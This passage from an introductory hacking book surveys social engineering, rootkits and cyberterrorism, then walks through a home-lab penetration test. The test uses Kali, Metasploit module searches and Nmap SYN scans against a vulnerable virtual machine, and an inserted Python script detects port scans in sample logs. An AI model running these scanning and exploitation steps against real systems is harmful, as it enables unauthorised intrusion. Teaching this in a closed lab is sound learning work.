Technical - The other area of social engineering is using technology as a means of support to obtain information. This can involve a hacker sending a fax or an email to a legitimate user
which requires the user to respond with sensitive information. The hacker often poses as law enforcement or a legal representative, requiring the information as part of an ongoing investigation for
their files.
Rootkit
A rootkit finds its way onto your operating system through legitimate processes, using low-level and hard-to-detect programs. The rootkit can take control of the operating system away from the user,
and since the program itself is hidden within the system binaries as replacement pieces of code, it can be incredibly difficult and virtually impossible for the user to detect and remove the program
manually.
Packet Analyser
When transmitting data across the internet or any other network, an application known as a packet analyser or packet sniffer can be used by a hacker to capture data packets which may contain
critical information such as passwords and other records.
Chapter 6 : Basics of cyber security

As computing technology advances, so too does the risk of cyber terrorism, not only to personal networks but also to government institutions, banking and security organizations, where the
damage can be quite widespread. Cyberterrorism is largely different from the aforementioned cybercrime, as the nature of cyber terrorism is more to inflict fear and devastation upon a network and
the institution it is contained within.
Cyberterrorism can be conducted in order to reach some kind of personal objective through the use of computer networks and the internet with some experienced cyberterrorists being able to
cause mass damage towards government systems, hospital records as well as national military and security programs that leave a country in a state of turmoil, terrified of further attacks. The
objective for many cyberterrorists is often related to political or ideological agendas.
Cyberterrorism can be challenging to prevent or protect systems from, as it can be largely anonymous, with unknown motivations and uncertainty over whether there could be repeated attacks
in the future. There is some argument over the exact definition of cyber terrorism, or whether it should be referred to as terrorism at all, since the actions are not closely linked with
conventional methods of terrorism and instead lean towards information warfare; however, since many of the motives are political in nature and targeted towards the disruption of infrastructure, the
term loosely fits into the category of terrorism.
Cyberterrorism can be committed by individuals, groups and organizations, and in some cases by nation states attacking rival governments. Cyberterrorism is currently a major concern for both
government and media sources due to the potential damage, with government agencies such as the Federal Bureau of Investigation (FBI) and the Central Intelligence Agency (CIA) establishing targeted
strike forces to reduce the damage caused by cyber terrorism.
Cyberterrorism can be accomplished through a variety of techniques, such as network penetration and viruses that are created in order to disrupt and immobilize the system. Cyberterrorism is
more dangerous than simple cybercrime for personal gain. Cyberterrorism can have serious consequences for the country and institutions that are attacked, placing lives at risk. As our technology
improves, there are a number of ways to combat cyberterrorism: first by anticipating and preparing for attacks and implementing a plan for prevention; following this, we prepare for incident
management to mitigate an attack and limit the damage caused in the case that an attack has reached the target. Once an attack has occurred, the next stage of defence is to implement consequence
management, which is assessing the damage and taking note of how we are able to improve defences in the future, starting the process over once again.
Traits of Cyber Terrorism
After understanding the definition of cyber terrorism, many cyber terrorists have been found to have very similar traits in common, which place them in the category of cyber terrorists. One such
trait is that the victims of cyber terrorist attacks are specifically targeted rather than random, as in the case of hackers without clear objectives other than financial gain or entertainment. While there
can be randomised cases of hackers releasing viruses or worms into the general public, there are often clear objectives for doing so, with the victims being a specific group or nation that has been
targeted for predetermined reasons by the hacker. Other objectives involve attacking an organization, industry, sector or economy for the purpose of inflicting damage or destroying their target.
Finally, another common trait within cyber terrorism is to further the terrorist group's own goals, which could be financial, political, religious or ideological. These terrorists seek to achieve this
goal by inflicting heavy damage on their target and make their own objectives obvious by publicising them.
Types of Cyber Terrorism Attack
Cyberterrorism has been placed within three main categories by the Centre for the Study of Terrorism and Irregular Warfare at the Naval Postgraduate School in Monterey, California. These
categories are simple-unstructured, advanced-structured and complex-coordinated.
Simple-Unstructured - These are small-scale attacks and are generally performed by inexperienced hackers using widely available tools created by other people. The hackers behind these kinds of
attacks generally lack command and control skills as well as possessing a limited learning capability.
Advanced-Structured - These types of attacks are more sophisticated and can target multiple systems or networks, and the hackers responsible possess the capability to modify or even create basic
hacking tools. While the hackers possess limited command and control skills, they have an increased learning capability and present a significant risk depending on the organization they are
targeting.
Complex-Coordinated - At the higher end of the scale, coordinated and complex attacks can have a devastating effect on the system under attack with mass disruptions against integrated and
heterogeneous defences. These types of hackers have the ability to create sophisticated hacking tools and have a strong command and control as well as an advanced capacity for further learning
and skill development.
Each of these types varies in sophistication and in the devastation it can cause, and largely depends on the motivation and objectives of the hackers. Understanding each type of attack allows organizations to develop the proper
counter measures to combat and prevent an attack as well as implement damage control in the wake of an attack.
Incursion - The objective of an incursion attack is to gain access to or penetrate the networks and systems which contain information valuable to the attackers. This is one of the more common
attacks and has a much greater success rate for the terrorists. Due to the high number of loopholes available to hackers, terrorists are able to take advantage of weak security and vulnerabilities to
obtain or even modify secure information, which can then be recycled for further attacks against the organization or for the personal gain of the attackers.
Destruction - This is a far more severe attack, with the objective to infiltrate a computer system, inflict damage and ultimately destroy the network. For the organizations who are victims of
these types of attacks, there can be incredible costs involved both in terms of repair and loss of revenue. An attacker intent on destruction can render an organization inoperable with their entire
system thrown into disarray, impacting them financially and in some cases destroying their reputation as clients fear for the security of their information following a serious attack. In terms of
governments, a destruction attack can plunge the systems into chaos. It can take some amount of time for an organization to recover fully from the most severe destruction attack, which is the
objective for the hacker.
Disinformation - Equally devastating can be disinformation. This involves spreading credibility-destroying rumours and information, having a severe impact on the target. The rumours
that are launched may or may not be true; however, they can be equally devastating and can still have long term effects on the organization or nation involved. Once these attacks are carried out,
damage control can be quite challenging as information can spread regardless of whether the infiltration is contained. The information can relate to certain scandals and claims of corruption which
can tarnish the reputation of individuals within the organization or the organization itself, leading to disruption of the order that has held the organization together.
Denial of Service - We have mentioned denial of service earlier in this book as it is one of the most common and widely known forms of attack. In terms of cyberterrorism, DoS attacks occur against
businesses and entities that have an online presence, with the attack rendering the website or service useless for the duration of the attack. These types of attacks can therefore cause immense issues in
both the social and economic function of the business, causing organizations to suffer massive losses.
Defacement of Web Sites - While not as severe or damaging, the defacement of a website can still have immense consequences for a business. Defacement can involve a website being
changed completely, including a message from the cyber terrorists for either propaganda or publicity purposes, to achieve some type of cause. In other cases, hackers may cause the website
to redirect to one which they have established earlier, which could also contain a message that they have devised to gain publicity and awareness of their propaganda or cause. These types of
attacks have decreased in recent years as security measures have been heightened, hackers have a lower probability of retaining access to web pages long enough to implement the changes, and most
major organizations have effectively put a stop to it.
Strategies to Combat Cyber Terrorist Threats
Implementing strategic plans to counter cyber terrorist efforts will ensure that your organization has the means to combat any threats it may face. There are a number of strategies which a business
can employ in order to stay ahead and heighten their security capabilities in the face of a threat. These are:
Prosecuting Perpetrators
Many attackers hide behind the wall of anonymity, with many smaller organizations failing to pursue and prosecute the hackers responsible. While this can be a costly activity, there are some
advantages in identifying and taking the attackers to court. This can be a shock to the cyber terrorist community and set the standard for how other organizations should conduct themselves in
the wake of an attack. If the case is particularly high profile, the organization can benefit from the hard-line response, with the prosecuted hackers being an example to the rest of the criminal
organizations that are determined to wreak havoc on your business. This example can send waves throughout the rest of the community and can lead to improvements in the investigation and
prosecution process for criminal cyber terrorists. Therefore, it is always in the best interest of the parties that have been affected by an attack to seek justice.
Develop New Security Practices
As an organization faces an attack, they will follow through by re-evaluating their security and any potential loopholes that could be exploited. This involves further testing, such as the pen-testing
we explored earlier, as a means of finding weaknesses and vulnerabilities and employing new security measures to combat these. These activities require cooperation and coordinated efforts amongst
all departments within an organization to ensure maximum effectiveness. Corporations should review international standards and guidelines for information security to detail the steps that should be
taken in order to secure the organization. As organizations further develop their security capabilities, they are able to adapt and modify the standard guidelines to
suit their own operations and needs to achieve the best results.
Take a Proactive Approach
It is important for both corporations and the general public to take a proactive approach as the threat from cyber terrorism becomes more sophisticated and targeted. This involves keeping up to
date with the latest information within the cyber security sphere such as threats, vulnerabilities and noteworthy incidents as they will allow security professionals to gain a deeper insight into how
these components could affect their organizations. From there they are able to develop and implement stronger security measures thereby reducing the opportunities for hackers to exploit for
cyber-attacks.
Organizations should constantly be at the forefront of cyber security, having a multi-level security infrastructure in order to protect valuable data and users' private information. All activities that
are critical in nature should have frequent security audits to ensure all policies and procedures relating to security are adhered to. Security should be treated as an ongoing and continuous
process rather than an afterthought following the consequences of an attack.
Deploy Vital Security Applications
There are many tools available for security professionals to protect their networks and they can provide a significant benefit to the job at hand. These applications involve firewalls, IDS, as well
as anti-virus software that can ensure better protections against potential hackers. Using these security systems, security personnel are able to record, monitor and report any suspicious activities
that can indicate the system is at risk. The applications are able to streamline the process, making the job far more efficient and effective. Utilizing these types of tools ensures that security
personnel are assisted with the latest in prevention technology and have a greater probability of combating attackers.
Establish Business Disaster Recovery Plans
In the event that an attack does occur, all businesses should have a worst-case scenario contingency plan in place to ensure that processes and operations are brought back to normal as soon as
possible. Without such plans, the consequences can be disastrous, leading to a loss in revenue and reputation on behalf of the business. Once these plans have been devised, they should be
rehearsed regularly in order to test their effectiveness and also provide staff with training in the event of an attack.
These plans should be comprised of two main components, these being, repair and restoration. From the perspective of repair, the attacking force should be neutralised as soon as possible with
the objective to return operations to normalcy and have all functions up and running. The restoration element is geared towards having pre-specified arrangements with hardware, software as well
as a network comprised of service vendors, emergency services and public utilities on hand to assist in the restoration process.
Cooperation with Other Firms
Your organization would not be alone in dealing with the aftermath of a cyber-attack. Many organizations exist in order to deal with cyber terrorism threats both public and private. These groups
can go a long way in helping with issues relating to cyber terrorism such as improving the security within your organization, helping devise and implement disaster recovery plans and further
discuss how you can deal with threats in the future and what this means for the wider community. Having this extended network available to you will enhance your efforts in resisting cyber-
attacks as well as having a role in discussing other emerging threats and protecting organizations facing these same threats.
Increasing Security Awareness
In times when security threats are prevalent, there is a need for increased awareness of all issues relating to cyber security. Having your organization become an authority in raising
awareness within the community will help educate other organizations in how they can defend themselves against attacks and strengthen their own security, which in turn will damage the
cyberterrorist community as they face a stronger resistance. You can also raise awareness within your own organization through security training programs, which will help all employees equip
themselves with the right skillset to combat threats that could arise through their own negligence and will also help them be more alert in times when threats could be present.
Chapter 7 : Protect yourself from cyber attacks and secure your computer and other devices

Now that you have a good understanding of hacking concepts and what is involved in the penetration of a system, as well as how you can turn hacking into a career, we want to get into the heart
of the action and learn how to carry out an effective attack. This is for demonstration purposes, to help strengthen your knowledge and ideally encourage further education. If you are still unsure of
the basics of hacking, have a read through and study this book thoroughly, as we will be going through this step by step guide with the assumption that you have a solid grasp of the topics of
hacking and computer security, and we wouldn't want you to get lost along the way.
Before you do get started, you will need to utilize a tool to help with the pen-test. For this example, we will be using Metasploit, an open source tool which has a number of functions that pen-testers
and black hat hackers alike will find incredibly useful. The tool has a database filled with a large number of known exploits which can be picked up during the vulnerability test by the
variety of scanners. Metasploit is one of the more popular pen-testing software applications and, as an open source program, there is a large community which you can interact with in case you
have any questions or concerns.
We will be hacking into a virtual machine, as this is a great way to practice and scan for weaknesses without actually breaking into an established machine. We will be scanning our virtual
machine for exploits, upon which we will then penetrate the system and extract the information we require. The virtual machine will also have limited access, meaning it won't be as easily
accessible to other people who may be scanning your network, leaving you in complete control. In order to create a virtual machine, we will be using VirtualBox, software that allows
you to establish a hacking lab in order to test your skills on a simulated machine. VirtualBox is another open source program that gives you access to the source code free of charge,
allowing you to customise your build to your specifications.
Before continuing with your experiment ensure that the techniques and tools you use throughout this test are confined only to your machine and never used on other computers as this is not only
illegal, it is also potentially dangerous. Even if you are simply learning how to carry out an attack for the purpose of your own education, if you are caught you can be prosecuted, and as you
should have a good understanding from reading this book, this can be quite a serious crime and yes, it is possible to be caught. Keeping this in mind, let us go through with our virtual pen-test.
Initial Preparation
The first step toward setting up your environment is creating a virtual machine to run on VirtualBox. You will need two machines, an attacker and a target (the victim). You are able to download these online;
they will come with files that we can extract as well as vulnerabilities to exploit. Once you have the files in place, extract them, create a new machine in VirtualBox and choose the type of
machine you will be using. From there you decide how much RAM your machine will be running with; this isn't too important, so selecting a small amount won't affect your test, and 512MB is a
good starting point.
Your next task is then to select a hard disk by checking the Use an Existing Disk option. Click on the folder icon and select the appropriate file that you extracted from your
downloaded files. Once that is all done, click Create and your virtual machine is ready; you can move on to the next step.
Creating a Network
In order to access your machine, you will need to establish a virtual network. This is to keep your machine safe from existing threats outside your control. You are able to do this through
VirtualBox by going through File > Preferences > Network > Host Only Network. Once you click the plus sign, you are able to add a new entry, which will be your virtual network. Now it is time
to add your virtual machine to the virtual network. You are able to do this by selecting your virtual machine and clicking Settings from the menu. From there you will see the Network tab, which
will allow you to click 'Attached to' and select Host-Only Adapter from the drop-down menu.
Attacking Tools
Now that your network and machine have been set up, it is time to acquire the tools to launch your attack. In this example, we will be using Kali, as it is simple to set up and you can also run it live
in a virtual machine. Once you have downloaded Kali as an ISO file, open VirtualBox and click Add to create another machine, which will be your attacker. For your attacker, you
want to allocate some more memory to the machine, around 2GB; if your host has less than 4GB of RAM, you may need to allocate less. You will not need to allocate any hard drive
space, since Kali is running live, so check the box Do Not Add a Virtual Hard Drive. Once you are ready, hit Create and your attacking machine will be created. Ensure that you attach the machine to
your network and change the adapter to host-only. From here, you will start both machines and run Kali on your attack machine when prompted to add a bootable CD. You are then presented
with the interface, and are ready to start scanning and gathering information from the Kali desktop.
Gathering Information
The next step in carrying out your attack is deciding upon your target. For the purpose of this experiment, we will be carrying out the attack on our victim server. In reality, this is a simple surface
attack rather than focusing on the entire network that we had set up or the virtualization tools. From there it is time to gather information to discover the vulnerabilities that we will be exploiting.
In order to do this, we will need to set this up in the software. This is where Metasploit will come into play as our framework for carrying out the pen-test, taking us through the process.
To do this, we must first initiate the services through Kali by entering:
service postgresql start
service metasploit start
Metasploit is best used through the console interface known as MSFConsole, which is opened with:
msfconsole
Now you are ready to start your scan.
Scanning for Ports
In order to gather information on ports, you can use Nmap, which is built into MSFconsole as the db_nmap command. In order to set this up, you will first need the IP address of the target, which you can find by
typing in
ifconfig
This will then bring up information on the IP address, labelled inet addr within the eth0 block. The IP address should be similar to those of other machines found on your network. By running a scan of
the IP address using
db_nmap -sS -A <target IP address>
you are able to get a detailed list of all services running on the machine. From there you are able to gather further information on each of the services to discover any vulnerabilities to exploit. Once
you have found the weakest point, you are able to move into attack mode.
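The SYN scan above (the -sS option) is exactly the activity a defender on the target side should be watching for. As an added example (not from the book), the following Python script parses constructed firewall log lines written in the style of iptables LOG output and flags any source address that hits many distinct ports within a short window; the log format, the window size and the port threshold are assumptions made for this example.

```python
"""Detect a SYN port sweep from host firewall logs on the scanned machine.
Added example; the log lines below are constructed in the style of iptables
LOG output, and the detection thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime


def _line(ts, src, dpt, proto="TCP", flags="SYN"):
    """Build one constructed log line in iptables LOG style."""
    return (f"Mar 10 {ts} victim kernel: IN=eth0 OUT= SRC={src} "
            f"DST=192.168.56.102 PROTO={proto} SPT=43211 DPT={dpt} WINDOW=1024 {flags} URGP=0")


# Constructed sample: 192.168.56.101 probes twelve ports within two seconds,
# while 192.168.56.50 behaves like an ordinary client (and sends one UDP packet).
SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445, 3306]
SAMPLE_LOG = "\n".join(
    [_line("12:00:01" if i < 6 else "12:00:02", "192.168.56.101", p)
     for i, p in enumerate(SCAN_PORTS)]
    + [_line("12:00:03", "192.168.56.50", 443),
       _line("12:00:09", "192.168.56.50", 22),
       _line("12:00:09", "192.168.56.50", 5353, proto="UDP", flags="")]
)

# Only lines carrying the SYN flag matter for a SYN-scan detector.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s.*?SRC=(?P<src>\S+).*?DPT=(?P<dpt>\d+).*?\bSYN\b"
)


def parse_syn_events(log_text):
    """Return (timestamp, source, destination port) for each SYN log line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year is irrelevant here
            events.append((ts, m["src"], int(m["dpt"])))
    return events


def find_port_sweeps(events, window_s=10, min_ports=10):
    """Sliding-window count of distinct destination ports per source.
    Returns {source: max distinct ports seen inside any window_s-second window}
    for sources that reach min_ports."""
    by_src = defaultdict(list)
    for ts, src, dpt in events:
        by_src[src].append((ts, dpt))
    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        in_window = defaultdict(int)  # port -> hits currently inside the window
        left = 0
        for ts, dpt in evs:
            in_window[dpt] += 1
            # Drop events that fell out of the window ending at ts.
            while (ts - evs[left][0]).total_seconds() > window_s:
                old = evs[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= min_ports:
                alerts[src] = max(alerts.get(src, 0), len(in_window))
    return alerts


if __name__ == "__main__":
    for src, n in find_port_sweeps(parse_syn_events(SAMPLE_LOG)).items():
        print(f"possible SYN scan from {src}: {n} distinct ports within 10s")
```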
Exploitation
By entering the services command into MSFconsole, you are able to access the database of information on the services running on the machine. Once you have discovered a service that is particularly vulnerable,
you are able to search for known weaknesses in this service. This is done by typing
search <service name>
You will be provided with a list of exploits which you can take advantage of, and can then tell MSFconsole to use the chosen exploit module. Once you have set the target, you simply need to type the command "run"
for the program to work its magic and access the port. You will then be able to see what you can do once operating from the computer, with a number of commands at your disposal under
the permissions provided to you by the service. From here you are able to extract data as well as upload data, depending on your objective.
Once you have accessed the machine, you will obviously want to ensure that you remained in control and fortunately Metasploit has a number of tools to assist.
Conclusion
With this, we have now come to the end of this book. In the world of computer networking, security is given very high importance so as to protect data and safeguard the system from intruders.
In spite of strict security guidelines and authentication schemes, hackers have managed to break into several systems skillfully, piquing the interest of common folk.
Some hackers were able to develop groundbreaking utilities and websites like Facebook and Netflix (the founders of these websites are self-proclaimed hackers), so it is not surprising to see so
many young people wanting to learn hacking. Before venturing into the depths of hacking, one needs to have clear-cut ideas about the basics of hacking. That is exactly what this book is intended
for.
I have explained all the concepts of hacking in a lucid and comprehensive manner; however, putting them all into practice may seem tough initially. But do not get discouraged. Hacking is all
about practice, besides good problem solving skills. Make use of websites like “Hack this site,” which allow hackers to test their hacking skills legally. Also, do not think twice before seeking the
help of a professional security specialist if you feel all of this is too technical for you.
By now, you will have a good idea of what hacking is and the consequences that occur if an external or internal party attacks your system.
And please note that the world of computers is always changing and advancing. The more advanced the system, the more you need to improve your knowledge.